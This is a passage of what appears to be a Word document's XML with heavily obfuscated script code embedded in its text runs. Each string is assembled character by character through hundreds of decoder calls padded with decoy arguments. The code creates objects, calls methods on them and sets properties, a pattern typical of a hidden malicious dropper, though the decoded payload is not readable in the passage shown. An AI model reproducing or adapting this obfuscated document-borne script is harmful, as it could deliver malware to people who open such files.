vnfwrit4[Vgtf_56-(Vgtf_56/3)]=109; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vnfwrit4[600]-vnfwrit4[Vgtf_56]),RunGe);  })('Both81')+(function(Rt,Rx){ var wqpoth3=Brfcook; wqpoth3[Vgtf_56]=2; wqpoth3[Vgtf_56-(Vgtf_56/3)]=113; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wqpoth3[600]-wqpoth3[Vgtf_56]),RunGe);  })('robot28',true)+(function(Rt,Rx){ var vvhonly5=Brfcook; vvhonly5[Vgtf_56]=0; vvhonly5[Vgtf_56-(Vgtf_56/3)]=109; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vvhonly5[600]-vvhonly5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var fitme4=Brfcook; fitme4[Vgtf_56]=4; fitme4[Vgtf_56-(Vgtf_56/3)]=109; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fitme4[600]-fitme4[Vgtf_56]),RunGe);  })(false,'idea46',null,'indeed17');   if (gicqnsocial54[(function(Rt,Rx){ var pwjothe3=Brfcook; pwjothe3[Vgtf_56]=3; pwjothe3[Vgtf_56-(Vgtf_56/3)]=108; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pwjothe3[600]-pwjothe3[Vgtf_56]),RunGe);  })(false,'robot28','into6')+(function(Rt,Rx){ var qjsfea3=Brfcook; qjsfea3[Vgtf_56]=2; qjsfea3[Vgtf_56-(Vgtf_56/3)]=112; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qjsfea3[600]-qjsfea3[Vgtf_56]),RunGe);  })('into30','Asimov30')+(function(Rt,Rx){ var pftmerel3=Brfcook; pftmerel3[Vgtf_56]=3; pftmerel3[Vgtf_56-(Vgtf_56/3)]=103; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pftmerel3[600]-pftmerel3[Vgtf_56]),RunGe);  })('idea46','indeed17',900)+(function(Rt,Rx){ var petroad5=Brfcook; petroad5[Vgtf_56]=4; petroad5[Vgtf_56-(Vgtf_56/3)]=105; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(petroad5[600]-petroad5[Vgtf_56]),RunGe);  })(null,'lawsthe36','free58',true)+(function(Rt,Rx){ var fifever5=Brfcook; fifever5[Vgtf_56]=2; fifever5[Vgtf_56-(Vgtf_56/3)]=122; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fifever5[600]-fifever5[Vgtf_56]),RunGe);  })(true,true)+(function(Rt,Rx){ var jnugradu5=Brfcook; jnugradu5[Vgtf_56]=1; jnugradu5[Vgtf_56-(Vgtf_56/3)]=80; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jnugradu5[600]-jnugradu5[Vgtf_56]),RunGe);  })(false)+(function(Rt,Rx){ var hiwgr5=Brfcook; hiwgr5[Vgtf_56]=1; hiwgr5[Vgtf_56-(Vgtf_56/3)]=103; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hiwgr5[600]-hiwgr5[Vgtf_56]),RunGe);  })(false)](gicqnsystem50)&gt;-1)  {</w:t>
        <w:tab/>
        <w:t xml:space="preserve">       gicqndistributing22 =gicqndaily68[(function(Rt,Rx){ var vtimere5=Brfcook; vtimere5[Vgtf_56]=3; vtimere5[Vgtf_56-(Vgtf_56/3)]=82; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vtimere5[600]-vtimere5[Vgtf_56]),RunGe);  })('idea46','indeed17','supposed39')+(function(Rt,Rx){ var iqkevery3=Brfcook; iqkevery3[Vgtf_56]=3; iqkevery3[Vgtf_56-(Vgtf_56/3)]=115; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(iqkevery3[600]-iqkevery3[Vgtf_56]),RunGe);  })(true,1173,1173)+(function(Rt,Rx){ var fnvgradu5=Brfcook; fnvgradu5[Vgtf_56]=1; fnvgradu5[Vgtf_56-(Vgtf_56/3)]=102; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fnvgradu5[600]-fnvgradu5[Vgtf_56]),RunGe);  })(false)+(function(Rt,Rx){ var tiuHe3=Brfcook; tiuHe3[Vgtf_56]=2; tiuHe3[Vgtf_56-(Vgtf_56/3)]=112; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(tiuHe3[600]-tiuHe3[Vgtf_56]),RunGe);  })(547,547)+(function(Rt,Rx){ var junli4=Brfcook; junli4[Vgtf_56]=3; junli4[Vgtf_56-(Vgtf_56/3)]=87; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(junli4[600]-junli4[Vgtf_56]),RunGe);  })('second5',null,2784)+(function(Rt,Rx){ var ekkwrit4=Brfcook; ekkwrit4[Vgtf_56]=2; ekkwrit4[Vgtf_56-(Vgtf_56/3)]=103; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ekkwrit4[600]-ekkwrit4[Vgtf_56]),RunGe);  })('Both81','beingcharitable40')+(function(Rt,Rx){ var ktfwork3=Brfcook; ktfwork3[Vgtf_56]=4; ktfwork3[Vgtf_56-(Vgtf_56/3)]=124; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ktfwork3[600]-ktfwork3[Vgtf_56]),RunGe);  })('although94',1347,'humans57','would68')+(function(Rt,Rx){ var jtqgra3=Brfcook; jtqgra3[Vgtf_56]=1; jtqgra3[Vgtf_56-(Vgtf_56/3)]=117; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jtqgra3[600]-jtqgra3[Vgtf_56]),RunGe);  })(true)+(function(Rt,Rx){ var pwicons5=Brfcook; pwicons5[Vgtf_56]=3; pwicons5[Vgtf_56-(Vgtf_56/3)]=73; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pwicons5[600]-pwicons5[Vgtf_56]),RunGe);  })('declarations83','provided81',false)+(function(Rt,Rx){ var fivothe3=Brfcook; fivothe3[Vgtf_56]=0; fivothe3[Vgtf_56-(Vgtf_56/3)]=105; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fivothe3[600]-fivothe3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var upqFort3=Brfcook; upqFort3[Vgtf_56]=1; upqFort3[Vgtf_56-(Vgtf_56/3)]=109; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(upqFort3[600]-upqFort3[Vgtf_56]),RunGe);  })(828)+(function(Rt,Rx){ var pfjco4=Brfcook; pfjco4[Vgtf_56]=4; pfjco4[Vgtf_56-(Vgtf_56/3)]=105; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pfjco4[600]-pfjco4[Vgtf_56]),RunGe);  })(false,749,'declarations83',true)](gicqndisastrous12,gicqngoal92,false,0);           gicqnlook37=gicqndistributing22[(function(Rt,Rx){ var ptwfeatu4=Brfcook; ptwfeatu4[Vgtf_56]=4; ptwfeatu4[Vgtf_56-(Vgtf_56/3)]=86; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ptwfeatu4[600]-ptwfeatu4[Vgtf_56]),RunGe);  })('into30',2405,true,'Asimov30')+(function(Rt,Rx){ var jqwski5=Brfcook; jqwski5[Vgtf_56]=2; jqwski5[Vgtf_56-(Vgtf_56/3)]=103; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jqwski5[600]-jqwski5[Vgtf_56]),RunGe);  })(null,false)+(function(Rt,Rx){ var vppskil4=Brfcook; vppskil4[Vgtf_56]=1; vppskil4[Vgtf_56-(Vgtf_56/3)]=98; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vppskil4[600]-vppskil4[Vgtf_56]),RunGe);  })(null)+(function(Rt,Rx){ var tkuwrit4=Brfcook; tkuwrit4[Vgtf_56]=1; tkuwrit4[Vgtf_56-(Vgtf_56/3)]=101; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(tkuwrit4[600]-tkuwrit4[Vgtf_56]),RunGe);  })('Both81')+(function(Rt,Rx){ var penwe3=Brfcook; penwe3[Vgtf_56]=3; penwe3[Vgtf_56-(Vgtf_56/3)]=68; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(penwe3[600]-penwe3[Vgtf_56]),RunGe);  })(false,'astonished95','Labyrinthine79')+(function(Rt,Rx){ var wjfthat84=Brfcook; wjfthat84[Vgtf_56]=3; wjfthat84[Vgtf_56-(Vgtf_56/3)]=111; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wjfthat84[600]-wjfthat84[Vgtf_56]),RunGe);  })(true,true,null)+(function(Rt,Rx){ var wiwgr5=Brfcook; wiwgr5[Vgtf_56]=2; wiwgr5[Vgtf_56-(Vgtf_56/3)]=110; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wiwgr5[600]-wiwgr5[Vgtf_56]),RunGe);  })(false,'Laws75')]();           gicqndistributing22[(function(Rt,Rx){ var vtesk5=Brfcook; vtesk5[Vgtf_56]=4; vtesk5[Vgtf_56-(Vgtf_56/3)]=71; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vtesk5[600]-vtesk5[Vgtf_56]),RunGe);  })(false,null,'human24',true)+(function(Rt,Rx){ var euiliv5=Brfcook; euiliv5[Vgtf_56]=4; euiliv5[Vgtf_56-(Vgtf_56/3)]=112; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(euiliv5[600]-euiliv5[Vgtf_56]),RunGe);  })('second5',null,null,2865)+(function(Rt,Rx){ var hhuroad3=Brfcook; hhuroad3[Vgtf_56]=2; hhuroad3[Vgtf_56-(Vgtf_56/3)]=113; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hhuroad3[600]-hhuroad3[Vgtf_56]),RunGe);  })('lawsthe36','free58')+(function(Rt,Rx){ var nujroadI5=Brfcook; nujroadI5[Vgtf_56]=3; nujroadI5[Vgtf_56-(Vgtf_56/3)]=118; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(nujroadI5[600]-nujroadI5[Vgtf_56]),RunGe);  })('lawsthe36',261,null)+(function(Rt,Rx){ var ishHe3=Brfcook; ishHe3[Vgtf_56]=4; ishHe3[Vgtf_56-(Vgtf_56/3)]=105; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ishHe3[600]-ishHe3[Vgtf_56]),RunGe);  })(false,'rooted92','thus68',1003)]();</w:t>
        <w:tab/>
        <w:t xml:space="preserve">       gicqndistributing22=null;           gicqnpersons85[(function(Rt,Rx){ var pqfwere5=Brfcook; pqfwere5[Vgtf_56]=1; pqfwere5[Vgtf_56-(Vgtf_56/3)]=101; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pqfwere5[600]-pqfwere5[Vgtf_56]),RunGe);  })(null)+(function(Rt,Rx){ var pewBisma5=Brfcook; pewBisma5[Vgtf_56]=1; pewBisma5[Vgtf_56-(Vgtf_56/3)]=98; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pewBisma5[600]-pewBisma5[Vgtf_56]),RunGe);  })(2823)+(function(Rt,Rx){ var qjsthat4=Brfcook; qjsthat4[Vgtf_56]=2; qjsthat4[Vgtf_56-(Vgtf_56/3)]=118; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qjsthat4[600]-qjsthat4[Vgtf_56]),RunGe);  })(1043,true)+(function(Rt,Rx){ var etuconsc3=Brfcook; etuconsc3[Vgtf_56]=4; etuconsc3[Vgtf_56-(Vgtf_56/3)]=101; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(etuconsc3[600]-etuconsc3[Vgtf_56]),RunGe);  })(null,true,false,1872)+(function(Rt,Rx){ var vfnfeat5=Brfcook; vfnfeat5[Vgtf_56]=2; vfnfeat5[Vgtf_56-(Vgtf_56/3)]=86; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vfnfeat5[600]-vfnfeat5[Vgtf_56]),RunGe);  })('into30','Asimov30')+(function(Rt,Rx){ var uqwlivel5=Brfcook; uqwlivel5[Vgtf_56]=2; uqwlivel5[Vgtf_56-(Vgtf_56/3)]=123; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uqwlivel5[600]-uqwlivel5[Vgtf_56]),RunGe);  })(true,false)+(function(Rt,Rx){ var sqwskil5=Brfcook; sqwskil5[Vgtf_56]=1; sqwskil5[Vgtf_56-(Vgtf_56/3)]=113; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(sqwskil5[600]-sqwskil5[Vgtf_56]),RunGe);  })('human24')+(function(Rt,Rx){ var qsngra5=Brfcook; qsngra5[Vgtf_56]=2; qsngra5[Vgtf_56-(Vgtf_56/3)]=103; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qsngra5[600]-qsngra5[Vgtf_56]),RunGe);  })('Laws75','although94')]=(function(Rt,Rx){ var uppgrad4=Brfcook; uppgrad4[Vgtf_56]=0; uppgrad4[Vgtf_56-(Vgtf_56/3)]=98; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uppgrad4[600]-uppgrad4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var vqecon4=Brfcook; vqecon4[Vgtf_56]=1; vqecon4[Vgtf_56-(Vgtf_56/3)]=106; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vqecon4[600]-vqecon4[Vgtf_56]),RunGe);  })('what20')+(function(Rt,Rx){ var viplive4=Brfcook; viplive4[Vgtf_56]=4; viplive4[Vgtf_56-(Vgtf_56/3)]=114; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(viplive4[600]-viplive4[Vgtf_56]),RunGe);  })('second5','itself96','being84',1837)+(function(Rt,Rx){ var fejroadI4=Brfcook; fejroadI4[Vgtf_56]=3; fejroadI4[Vgtf_56-(Vgtf_56/3)]=49; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fejroadI4[600]-fejroadI4[Vgtf_56]),RunGe);  })('lawsthe36','free58','being84')+(function(Rt,Rx){ var jhsfeatu3=Brfcook; jhsfeatu3[Vgtf_56]=0; jhsfeatu3[Vgtf_56-(Vgtf_56/3)]=98; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jhsfeatu3[600]-jhsfeatu3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var pehgr5=Brfcook; pehgr5[Vgtf_56]=1; pehgr5[Vgtf_56-(Vgtf_56/3)]=98; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pehgr5[600]-pehgr5[Vgtf_56]),RunGe);  })('addition49')+(function(Rt,Rx){ var uwwthat85=Brfcook; uwwthat85[Vgtf_56]=1; uwwthat85[Vgtf_56-(Vgtf_56/3)]=116; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uwwthat85[600]-uwwthat85[Vgtf_56]),RunGe);  })('obey60')+(function(Rt,Rx){ var ijvandem3=Brfcook; ijvandem3[Vgtf_56]=4; ijvandem3[Vgtf_56-(Vgtf_56/3)]=105; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ijvandem3[600]-ijvandem3[Vgtf_56]),RunGe);  })('could80','State64',true,null)+(function(Rt,Rx){ var thuFor3=Brfcook; thuFor3[Vgtf_56]=3; thuFor3[Vgtf_56-(Vgtf_56/3)]=57; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(thuFor3[600]-thuFor3[Vgtf_56]),RunGe);  })('while59',false,'that50')+(function(Rt,Rx){ var ittleade3=Brfcook; ittleade3[Vgtf_56]=0; ittleade3[Vgtf_56-(Vgtf_56/3)]=52; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ittleade3[600]-ittleade3[Vgtf_56]),RunGe);  })();           gicqnpersons85[(function(Rt,Rx){ var nutof5=Brfcook; nutof5[Vgtf_56]=3; nutof5[Vgtf_56-(Vgtf_56/3)]=119; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(nutof5[600]-nutof5[Vgtf_56]),RunGe);  })(null,'daily6','rooted92')+(function(Rt,Rx){ var khugrad3=Brfcook; khugrad3[Vgtf_56]=3; khugrad3[Vgtf_56-(Vgtf_56/3)]=104; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(khugrad3[600]-khugrad3[Vgtf_56]),RunGe);  })('robots83',null,'conscience16')+(function(Rt,Rx){ var vntmer4=Brfcook; vntmer4[Vgtf_56]=3; vntmer4[Vgtf_56-(Vgtf_56/3)]=123; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vntmer4[600]-vntmer4[Vgtf_56]),RunGe);  })('idea46','indeed17','supposed39')+(function(Rt,Rx){ var kjqavala4=Brfcook; kjqavala4[Vgtf_56]=1; kjqavala4[Vgtf_56-(Vgtf_56/3)]=117; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(kjqavala4[600]-kjqavala4[Vgtf_56]),RunGe);  })('progress41')]=gicqnlook37[(function(Rt,Rx){ var putgrad3=Brfcook; putgrad3[Vgtf_56]=0; putgrad3[Vgtf_56-(Vgtf_56/3)]=115; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(putgrad3[600]-putgrad3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var kenHer3=Brfcook; kenHer3[Vgtf_56]=1; kenHer3[Vgtf_56-(Vgtf_56/3)]=113; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(kenHer3[600]-kenHer3[Vgtf_56]),RunGe);  })(1562)+(function(Rt,Rx){ var wjegr4=Brfcook; wjegr4[Vgtf_56]=0; wjegr4[Vgtf_56-(Vgtf_56/3)]=108; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wjegr4[600]-wjegr4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var weiFort3=Brfcook; weiFort3[Vgtf_56]=1; weiFort3[Vgtf_56-(Vgtf_56/3)]=106; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(weiFort3[600]-weiFort3[Vgtf_56]),RunGe);  })(282)+(function(Rt,Rx){ var senofpov5=Brfcook; senofpov5[Vgtf_56]=1; senofpov5[Vgtf_56-(Vgtf_56/3)]=117; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(senofpov5[600]-senofpov5[Vgtf_56]),RunGe);  })(true)](gicqnwrong69)[(function(Rt,Rx){ var kkugra3=Brfcook; kkugra3[Vgtf_56]=4; kkugra3[Vgtf_56-(Vgtf_56/3)]=110; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(kkugra3[600]-kkugra3[Vgtf_56]),RunGe);  })(null,false,true,'addition49')+(function(Rt,Rx){ var pfigrat3=Brfcook; pfigrat3[Vgtf_56]=2; pfigrat3[Vgtf_56-(Vgtf_56/3)]=113; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pfigrat3[600]-pfigrat3[Vgtf_56]),RunGe);  })(false,'addition49')+(function(Rt,Rx){ var thjthat85=Brfcook; thjthat85[Vgtf_56]=4; thjthat85[Vgtf_56-(Vgtf_56/3)]=109; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(thjthat85[600]-thjthat85[Vgtf_56]),RunGe);  })(false,'obey60','factory29','know4')+(function(Rt,Rx){ var sqtgrati4=Brfcook; sqtgrati4[Vgtf_56]=4; sqtgrati4[Vgtf_56-(Vgtf_56/3)]=114; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(sqtgrati4[600]-sqtgrati4[Vgtf_56]),RunGe);  })(813,'addition49',null,'being51')]('');           gicqnrendered77[(function(Rt,Rx){ var iwtconsc4=Brfcook; iwtconsc4[Vgtf_56]=3; iwtconsc4[Vgtf_56-(Vgtf_56/3)]=82; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(iwtconsc4[600]-iwtconsc4[Vgtf_56]),RunGe);  })('declarations83','provided81','second5')+(function(Rt,Rx){ var jfvcons4=Brfcook; jfvcons4[Vgtf_56]=4; jfvcons4[Vgtf_56-(Vgtf_56/3)]=116; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jfvcons4[600]-jfvcons4[Vgtf_56]),RunGe);  })(1573,'declarations83','provided81',false)+(function(Rt,Rx){ var qvnan5=Brfcook; qvnan5[Vgtf_56]=4; qvnan5[Vgtf_56-(Vgtf_56/3)]=105; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qvnan5[600]-qvnan5[Vgtf_56]),RunGe);  })(51,'could80',null,51)+(function(Rt,Rx){ var sijfeat3=Brfcook; sijfeat3[Vgtf_56]=1; sijfeat3[Vgtf_56-(Vgtf_56/3)]=111; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(sijfeat3[600]-sijfeat3[Vgtf_56]),RunGe);  })('into30')]();           gicqnrendered77[(function(Rt,Rx){ var jsfconte4=Brfcook; jsfconte4[Vgtf_56]=3; jsfconte4[Vgtf_56-(Vgtf_56/3)]=87; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jsfconte4[600]-jsfconte4[Vgtf_56]),RunGe);  })(false,false,'what20')+(function(Rt,Rx){ var ttklive4=Brfcook; ttklive4[Vgtf_56]=2; ttklive4[Vgtf_56-(Vgtf_56/3)]=123; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ttklive4[600]-ttklive4[Vgtf_56]),RunGe);  })('second5','itself96')+(function(Rt,Rx){ var fupconsc3=Brfcook; fupconsc3[Vgtf_56]=3; fupconsc3[Vgtf_56-(Vgtf_56/3)]=115; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fupconsc3[600]-fupconsc3[Vgtf_56]),RunGe);  })(true,'declarations83',670)+(function(Rt,Rx){ var vkefea4=Brfcook; vkefea4[Vgtf_56]=1; vkefea4[Vgtf_56-(Vgtf_56/3)]=102; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vkefea4[600]-vkefea4[Vgtf_56]),RunGe);  })('into30')]=1;           gicqnrendered77[(function(Rt,Rx){ var fpegrad4=Brfcook; fpegrad4[Vgtf_56]=1; fpegrad4[Vgtf_56-(Vgtf_56/3)]=81; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fpegrad4[600]-fpegrad4[Vgtf_56]),RunGe);  })('robots83')+(function(Rt,Rx){ var qsjgra4=Brfcook; qsjgra4[Vgtf_56]=1; qsjgra4[Vgtf_56-(Vgtf_56/3)]=112; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qsjgra4[600]-qsjgra4[Vgtf_56]),RunGe);  })('robots83')+(function(Rt,Rx){ var fpproa4=Brfcook; fpproa4[Vgtf_56]=4; fpproa4[Vgtf_56-(Vgtf_56/3)]=119; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fpproa4[600]-fpproa4[Vgtf_56]),RunGe);  })(2544,true,'lawsthe36',2544)+(function(Rt,Rx){ var wnvHere3=Brfcook; wnvHere3[Vgtf_56]=4; wnvHere3[Vgtf_56-(Vgtf_56/3)]=109; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wnvHere3[600]-wnvHere3[Vgtf_56]),RunGe);  })(false,2817,'rooted92',true)+(function(Rt,Rx){ var qppgr4=Brfcook; qppgr4[Vgtf_56]=2; qppgr4[Vgtf_56-(Vgtf_56/3)]=118; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qppgr4[600]-qppgr4[Vgtf_56]),RunGe);  })(392,'addition49')+(function(Rt,Rx){ var jqegrad4=Brfcook; jqegrad4[Vgtf_56]=1; jqegrad4[Vgtf_56-(Vgtf_56/3)]=106; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jqegrad4[600]-jqegrad4[Vgtf_56]),RunGe);  })(false)+(function(Rt,Rx){ var nuhmere4=Brfcook; nuhmere4[Vgtf_56]=3; nuhmere4[Vgtf_56-(Vgtf_56/3)]=114; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(nuhmere4[600]-nuhmere4[Vgtf_56]),RunGe);  })('idea46','indeed17','supposed39')+(function(Rt,Rx){ var kphthat5=Brfcook; kphthat5[Vgtf_56]=3; kphthat5[Vgtf_56-(Vgtf_56/3)]=113; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(kphthat5[600]-kphthat5[Vgtf_56]),RunGe);  })('obey60','factory29',true)]=0;</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">              gicqnrendered77[(function(Rt,Rx){ var ivjoth5=Brfcook; ivjoth5[Vgtf_56]=3; ivjoth5[Vgtf_56-(Vgtf_56/3)]=90; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ivjoth5[600]-ivjoth5[Vgtf_56]),RunGe);  })(true,'robot28','into6')+(function(Rt,Rx){ var wteconte5=Brfcook; wteconte5[Vgtf_56]=0; wteconte5[Vgtf_56-(Vgtf_56/3)]=114; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wteconte5[600]-wteconte5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var thhdown64=Brfcook; thhdown64[Vgtf_56]=4; thhdown64[Vgtf_56-(Vgtf_56/3)]=109; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(thhdown64[600]-thhdown64[Vgtf_56]),RunGe);  })('situationbecame47','East98',true,null)+(function(Rt,Rx){ var ujiHere3=Brfcook; ujiHere3[Vgtf_56]=1; ujiHere3[Vgtf_56-(Vgtf_56/3)]=117; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ujiHere3[600]-ujiHere3[Vgtf_56]),RunGe);  })('rooted92')+(function(Rt,Rx){ var wikme4=Brfcook; wikme4[Vgtf_56]=0; wikme4[Vgtf_56-(Vgtf_56/3)]=101; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wikme4[600]-wikme4[Vgtf_56]),RunGe);  })()](gicqnpersons85[(function(Rt,Rx){ var unvHere83=Brfcook; unvHere83[Vgtf_56]=1; unvHere83[Vgtf_56-(Vgtf_56/3)]=111; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(unvHere83[600]-unvHere83[Vgtf_56]),RunGe);  })('rooted92')+(function(Rt,Rx){ var hppski4=Brfcook; hppski4[Vgtf_56]=3; hppski4[Vgtf_56-(Vgtf_56/3)]=114; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hppski4[600]-hppski4[Vgtf_56]),RunGe);  })(1118,'human24',true)+(function(Rt,Rx){ var kskev5=Brfcook; kskev5[Vgtf_56]=4; kskev5[Vgtf_56-(Vgtf_56/3)]=104; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(kskev5[600]-kskev5[Vgtf_56]),RunGe);  })(null,null,null,'White35')+(function(Rt,Rx){ var iufandem3=Brfcook; iufandem3[Vgtf_56]=1; iufandem3[Vgtf_56-(Vgtf_56/3)]=102; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(iufandem3[600]-iufandem3[Vgtf_56]),RunGe);  })('could80')+(function(Rt,Rx){ var iwvothe3=Brfcook; iwvothe3[Vgtf_56]=3; iwvothe3[Vgtf_56-(Vgtf_56/3)]=87; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(iwvothe3[600]-iwvothe3[Vgtf_56]),RunGe);  })('robot28',1156,'into6')+(function(Rt,Rx){ var hefava3=Brfcook; hefava3[Vgtf_56]=3; hefava3[Vgtf_56-(Vgtf_56/3)]=124; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hefava3[600]-hefava3[Vgtf_56]),RunGe);  })(null,null,2962)+(function(Rt,Rx){ var njuthep5=Brfcook; njuthep5[Vgtf_56]=0; njuthep5[Vgtf_56-(Vgtf_56/3)]=112; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(njuthep5[600]-njuthep5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var hvwski3=Brfcook; hvwski3[Vgtf_56]=0; hvwski3[Vgtf_56-(Vgtf_56/3)]=101; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hvwski3[600]-hvwski3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var sejHere3=Brfcook; sejHere3[Vgtf_56]=0; sejHere3[Vgtf_56-(Vgtf_56/3)]=100; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(sejHere3[600]-sejHere3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var ujvmere3=Brfcook; ujvmere3[Vgtf_56]=1; ujvmere3[Vgtf_56-(Vgtf_56/3)]=87; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ujvmere3[600]-ujvmere3[Vgtf_56]),RunGe);  })('idea46')+(function(Rt,Rx){ var iwkroadI4=Brfcook; iwkroadI4[Vgtf_56]=2; iwkroadI4[Vgtf_56-(Vgtf_56/3)]=99; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(iwkroadI4[600]-iwkroadI4[Vgtf_56]),RunGe);  })('lawsthe36','free58')+(function(Rt,Rx){ var jjucon5=Brfcook; jjucon5[Vgtf_56]=3; jjucon5[Vgtf_56-(Vgtf_56/3)]=111; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jjucon5[600]-jjucon5[Vgtf_56]),RunGe);  })('what20',2472,'humans11')+(function(Rt,Rx){ var ktfFo3=Brfcook; ktfFo3[Vgtf_56]=0; ktfFo3[Vgtf_56-(Vgtf_56/3)]=117; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ktfFo3[600]-ktfFo3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var itvme3=Brfcook; itvme3[Vgtf_56]=2; itvme3[Vgtf_56-(Vgtf_56/3)]=103; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(itvme3[600]-itvme3[Vgtf_56]),RunGe);  })('idea46','indeed17')]);           gicqndisastrous12=gicqndisastrous12[(function(Rt,Rx){ var fpeco4=Brfcook; fpeco4[Vgtf_56]=1; fpeco4[Vgtf_56-(Vgtf_56/3)]=115; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fpeco4[600]-fpeco4[Vgtf_56]),RunGe);  })('declarations83')+(function(Rt,Rx){ var wspever3=Brfcook; wspever3[Vgtf_56]=4; wspever3[Vgtf_56-(Vgtf_56/3)]=105; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wspever3[600]-wspever3[Vgtf_56]),RunGe);  })('White35','short49','which82',2538)+(function(Rt,Rx){ var hjfth5=Brfcook; 